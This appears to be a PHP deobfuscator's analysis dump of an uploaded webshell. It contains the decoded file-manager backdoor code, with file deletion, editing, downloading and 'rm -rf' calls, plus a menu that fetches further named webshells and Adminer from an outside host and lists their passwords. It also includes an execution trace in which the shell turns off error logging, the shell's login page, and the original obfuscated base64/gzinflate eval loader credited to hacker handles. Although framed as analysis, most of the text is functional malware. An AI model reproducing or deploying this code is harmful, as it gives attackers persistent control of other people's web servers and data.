($nana[\'action\'] == \'delete_file\') {\r\n\t$delete = unlink($file);\r\n\tif ($delete) {\r\nprint \'<strong>Delete file</strong> ok! \'.alt_ok().\'</div>\';\r\n\t}else{\r\nprint \'<strong>Delete file</strong> fail! \'.alt_fail().\'</div>\';\r\n\t}\r\n}\r\n//delete folder\r\nif ($nana[\'action\'] == \'delete_folder\' ) {\r\n\tif(is_dir($dir)) {\r\n\tif(is_writable($dir)) {\r\n\t\t@rmdir($dir);\r\n\t\t@exe("rm -rf $dir");\r\n\t\t@exe("rmdir /s /q $dir");\r\nprint \'<strong>Delete folder</strong> ok! \'.alt_ok().\'<a class="btn-close" href="?path=\'.dirname($dir).\'"></a></div>\';\r\n\t\t} else {\r\nprint \'<strong>Delete folder</strong> fail! \'.alt_fail().\'<a class="btn-close" href="?path=\'.dirname($dir).\'"></a></div>\';\r\n\t\t}\r\n\t}\r\n}\r\nprint \'<div class="table-responsive">\r\n<table class="table table-hover table-dark text-light">\r\n<thead>\r\n<tr>\r\n\t<td class="text-center">Name</td>\r\n\t\t<td class="text-center">Type</td>\r\n\t\t<td class="text-center">Last Edit</td>\r\n\t\t<td class="text-center">Size</td>\r\n\t\t<td class="text-center">Owner:Group</td>\r\n\t\t<td class="text-center">Perms</td>\r\n\t<td class="text-center">Action</td>\r\n</tr>\r\n</thead>\r\n<tbody class="text-nowrap">\';\t\t\r\nforeach($scand as $dir){\r\n\t$dt = date("Y-m-d G:i", filemtime("$path/$dir"));\r\n\tif(strlen($dir) > 25) {\r\n\t\t$_d = substr($dir, 0, 25)."...";\t\t\r\n\t}else{\r\n\t\t$_d = $dir;\r\n\t}\r\n\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t$downer = @posix_getpwuid(fileowner("$path/$dir"));\r\n\t\t$downer = $downer[\'name\'];\r\n\t} else {\r\n\t\t$downer = fileowner("$path/$dir");\r\n\t}\r\n\tif(function_exists(\'posix_getgrgid\')) {\r\n\t\t$dgrp = @posix_getgrgid(filegroup("$path/$dir"));\r\n\t\t$dgrp = $dgrp[\'name\'];\r\n\t} else {\r\n\t\t$dgrp = filegroup("$path/$dir");\r\n\t}\r\n\tif(!is_dir($path.\'/\'.$file)) continue;\r\n\t\t$size = filesize($path.\'/\'.$file)/1024;\r\n\t\t$size = round($size,3);\r\n\tif($size >= 1024){\r\n\t\t$size = round($size/1024,2).\' MB\';\r\n\t}else{\r\n\t\t$size = $size.\' KB\';\r\n\t}\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\nprint "\r\n<tr>\r\n\t<td><i class=\'bi bi-folder-fill\'></i><a class=\'text-decoration-none text-secondary\' onclick=\'c(\\"?dir=$path/$dir\\")\'>$_d</a></td>\r\n\t<td class=\'text-center\'>dir</td>\r\n\t<td class=\'text-center\'>$dt</td>\r\n\t<td class=\'text-center\'>-</td>\r\n\t<td class=\'text-center\'>$downer<cmd>@</cmd>$dgrp</td>\r\n\t<td class=\'text-center\'>";\r\n\t\tif(is_writable($path.\'/\'.$dir)) echo \'<cmd>\';\r\n\t\t\telseif(!is_readable($path.\'/\'.$dir)) echo \'<rd>\';\r\n\t\techo p($path.\'/\'.$dir);\r\n\t\tif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font></center></td>\';\r\nprint "\r\n\t<td class=\'text-center\'>\r\n\t<div class=\'btn-group\'>\r\n\t\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path/$dir&action=rename_folder\\")\'><i class=\'bi bi-pencil-fill\'></i></a><a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path/$dir&action=delete_folder\\")\'><i class=\'bi bi-trash-fill\'></i></a>\r\n\t</div>\r\n\t</td>\r\n</tr>";\r\n}\r\nforeach($scand as $file){\r\n\t$ft = date("Y-m-d G:i", filemtime("$path/$file"));\r\n\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t$fowner = @posix_getpwuid(fileowner("$path/$file"));\r\n\t\t$fowner = $fowner[\'name\'];\r\n\t} else {\r\n\t\t$fowner = fileowner("$path/$file");\r\n\t}\r\n\tif(function_exists(\'posix_getgrgid\')) {\r\n\t\t$fgrp = @posix_getgrgid(filegroup("$path/$file"));\r\n\t\t$fgrp = $fgrp[\'name\'];\r\n\t} else {\r\n\t\t$fgrp = filegroup("$path/$file");\r\n\t}\r\n\tif(!is_file($path.\'/\'.$file)) continue;\r\n\tif(strlen($file) > 25) {\r\n\t\t$_f = substr($file, 0, 25)."...-.".$ext;\t\t\r\n\t}else{\r\n\t\t$_f = $file;\r\n\t}\r\nprint "\r\n<tr>\r\n<td><i class=\'bi bi-file-earmark-text-fill\'></i><a class=\'text-decoration-none text-secondary\' onclick=\'c(\\"?dir=$path&action=view&opn=$file\\")\'>$_f</a></td>\r\n\t<td class=\'text-center\'>file</td>\r\n\t<td class=\'text-center\'>$ft</td>\r\n\t<td class=\'text-center\'>".sz(filesize($file))."</td>\r\n\t<td class=\'text-center\'>$fowner<cmd>@</cmd>$fgrp</td>\r\n\t<td class=\'text-center\'>";\r\n\tif(is_writable($path.\'/\'.$file)) echo \'<cmd>\';\r\n\telseif(!is_readable($path.\'/\'.$file)) echo \'<rd>\';\r\n\t\techo p($path.\'/\'.$file);\r\n\tif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font></td>\';\r\nprint "\r\n\t<td class=\'text-center\'>\r\n\t<div class=\'btn-group\'>\r\n\t\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=view&opn=$path/$file\\")\'><i class=\'bi bi-eye-fill\'></i></a>\r\n\t\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=edit&opn=$path/$file\\")\'><i class=\'bi bi-pencil-square\'></i></a>\r\n\t\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=rename&opn=$path/$file\\")\'><i class=\'bi bi-pencil-fill\'></i></a>\r\n\t\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=delete_file&opn=$path/$file\\")\'><i class=\'bi bi-trash-fill\'></i></a>\r\n\t\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=download&opn=$path/$file\\")\'><i class=\'bi bi-download\'></i></a>\r\n\t</div>\r\n\t</td>\r\n</tr>";\r\n}\r\n?>\r\n</tbody>\r\n</table>\r\n</div>\r\n<?php\r\nswitch ($nana[\'op\'])\r\n\t{\r\ncase (\'1\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'adminer.php\', \'https://random-php.ftp.sh/adminer.txt\')):\r\n\t$ok = \'<strong>adminer.php > </strong>ok! \'.alt_ok().\'</div>\';\r\n\t}\r\n\tbreak;\r\ncase (\'2\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'alfa.php\', \'https://random-php.ftp.sh/alfa.txt\')):\r\n\t$ok = \'<strong>alfa.php > </strong>ok! \'.alt_ok().\'</div>\';\r\n\t}\r\n\tbreak;\r\ncase (\'3\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'indosec.php\', \'https://random-php.ftp.sh/ids.txt\')):\r\n\t$ok = \'<strong>indosec.php > </strong>ok! \'.alt_ok().\'pass: IndoSec</div>\';\r\n\t}\r\n\tbreak;\r\ncase (\'4\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'indoxploit-v2.php\', \'https://random-php.ftp.sh/idx-v2.txt\')):\r\n\t$ok = \'<strong>indoxploit-v2.php > </strong>ok! \'.alt_ok().\'pass: IndoXploit</div>\';\r\n\t}\r\n\tbreak;\r\ncase (\'5\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'indoxploit-v3.php\', \'https://random-php.ftp.sh/idx-v3.txt\')):\r\n\t$ok = \'<strong>indoxploit-v3.php > </strong>ok! \'.alt_ok().\'pass: IndoXploit</div>\';\r\n\t}\r\n\tbreak;\r\ncase (\'6\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'wso.php\', \'https://random-php.ftp.sh/wso.txt\')):\r\n\t$ok = \'<strong>wso.php > </strong>ok! \'.alt_ok().\'pas: ghost287</div>\';\r\n\t}\r\n\tbreak;\r\ncase (\'7\'):\r\nswitch (true)\r\n\t{\r\ncase (op(\'fox-wso.php\', \'https://random-php.ftp.sh/fox-wso.txt\')):\r\n\t$ok = \'<strong>fox-wso.php > </strong>ok! \'.alt_ok().\'</div>\';\r\n\t}\r\n}\r\nprint "$ok\r\n<form action=\'?dir=$path\' method=\'POST\'>\r\n<div class=\'input-group\'>\r\n\t<select class=\'form-select form-select-sm\' name=\'op\'>\r\n\t\t<option selected disabled>select</option>\r\n\t\t<option value=\'1\'>adminer</option>\r\n\t\t<option value=\'2\'>alfa shell</option>\r\n\t\t<option value=\'3\'>indosec shell</option>\r\n\t\t<option value=\'4\'>indoxploit-v2 shell</option>\r\n\t\t<option value=\'5\'>indoxploit-v3 shell</option>\r\n\t\t<option value=\'6\'>wso shell</option>\r\n\t\t<option value=\'7\'>fox wso shell</option>\r\n\t</select>\r\n\t\t<button class=\'btn btn-outline-light btn-sm\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n\t</form>\r\n</div>\r\n\t<div class=\'text-secondary\'>Recode By S4dboyXPLOID404 Ft UCEN HAXOR</div>";\r\n?>\r\n</div>\r\n</div>\r\n</div>\r\n</body>\r\n</html>' /var/www/html/uploads/shellll.PHP(17) : eval()'d code 1 0
4 13 0 0.003908 701160 set_time_limit 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 3 1 0
4 13 1 0.003927 701224
4 13 R FALSE
4 14 0 0.003942 701192 error_reporting 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 4 1 0
4 14 1 0.003957 701232
4 14 R 22527
4 15 0 0.003970 701192 ini_set 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 5 2 'error_log' NULL
4 15 1 0.003986 701264
4 15 R ''
4 16 0 0.003999 701192 ini_set 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 6 2 'log_errors' 0
4 16 1 0.004015 701264
4 16 R '1'
4 17 0 0.004028 701192 ini_set 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 7 2 'max_execution_time' 0
4 17 1 0.004043 701232
4 17 R '0'
4 18 0 0.004056 701160 ini_set 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 8 2 'output_buffering' 0
4 18 1 0.004071 701232
4 18 R FALSE
4 19 0 0.004084 701160 ini_set 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 9 2 'display_errors' 0
4 19 1 0.004099 701232
4 19 R ''
4 20 0 0.004111 701160 session_start 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 10 0
4 20 1 0.004167 701912
4 20 R TRUE
4 21 0 0.004183 701912 date_default_timezone_set 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 11 1 'Asia/Jakarta'
4 21 1 0.004200 701976
4 21 R TRUE
4 22 0 0.004213 701928 array_merge 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 12 2 [] []
4 22 1 0.004228 702048
4 22 R []
3 A /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 12 $nana = []
3 A /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 13 $pwd = 'kontoll471'
4 23 0 0.004269 701984 date 0 /var/www/html/uploads/shellll.PHP(17) : eval()'d code(1) : eval()'d code 45 1 'Y'
4 23 1 0.004307 703112
4 23 R '2023'
0.004349 622544
TRACE END [2023-02-13 02:13:23.295294]
Generated HTML code
<html><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<title>localhost login filemanager V.0.1</title>
<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style-fm.css">
<script src="//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js"></script>
</head>
<body class="bg-secondary text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<form method="post">
<i class="bi bi-display"></i> Login Filemanager V.0.1
<div class="input-group mb-3">
<div class="input-group-text"><i class="bi bi-terminal"></i></div>
<input class="form-control form-control-sm" type="password" name="pwd" placeholder="Password" required="required">
</div>
</form>
<div class="text-secondary">© 2023 ./KarawangCyberTeam</div>
</div>
</div>
</div>
</body></html>Original PHP code
<?php
//SHELL INI KAMI RECODE DARI SHELL NYA UNKNOWNSEC
//ENCODE PHP BY: UCEN HAXOR
//OBFUSCATED BY: UCEN HAXOR
//SECURITY LEVEL: WEAK
//FROM: http://jdih.pekanbaru.go.id/public/images/-.php
//THANKS FOR USING MY OBFUSCATOR TOOLS
//
//AUTHOR: UCEN HAXOR [S4dboyXPLOID404]
//ROLE: FOUNDER
//THANKS TO : UNKNOWNSEC AND KOBUSTOR GHOST TEAM
$JhonCoders = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRCbGFja19Db2RlcnMlMjklMjklMjklMjklMjklM0I=";
$Black_Coders = "==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